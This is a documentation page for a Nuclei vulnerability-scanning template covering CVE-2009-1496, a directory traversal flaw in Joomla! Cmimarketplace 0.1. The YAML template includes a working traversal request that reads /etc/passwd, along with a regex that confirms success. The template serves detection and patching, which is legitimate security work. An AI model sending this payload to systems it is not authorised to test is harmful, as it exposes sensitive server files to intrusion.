Joomla! Cmimarketplace 0.1 - Local File Inclusion
ID: CVE-2009-1496
Severity: medium
Author: daffainfo
Tags: cve2009,cve,joomla,lfi,edb
Description
Section titled “Description”Joomla! Cmimarketplace 0.1 is susceptible to local file inclusion because com_cmimarketplace allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
YAML Source
Section titled “YAML Source”id: CVE-2009-1496
info: name: Joomla! Cmimarketplace 0.1 - Local File Inclusion author: daffainfo severity: medium description: | Joomla! Cmimarketplace 0.1 is susceptible to local file inclusion because com_cmimarketplace allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php. impact: | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: | Apply the latest patch or upgrade to a newer version of Joomla! Cmimarketplace to mitigate the vulnerability. reference: - https://www.exploit-db.com/exploits/8367 - https://nvd.nist.gov/vuln/detail/CVE-2009-1496 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2009-1496 cwe-id: CWE-22 epss-score: 0.01134 epss-percentile: 0.84662 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomla product: joomla tags: cve2009,cve,joomla,lfi,edb
http: - method: GET path: - "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4b0a0048304602210080241d9dd0a0c32d481ab792f5a027af3bb9f3f45297e57bb7689492f1432135022100c36d34ce0276976f4459075d856e90106f5d668b965d2ce8430939425d4c18aa:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2009/CVE-2009-1496.yaml"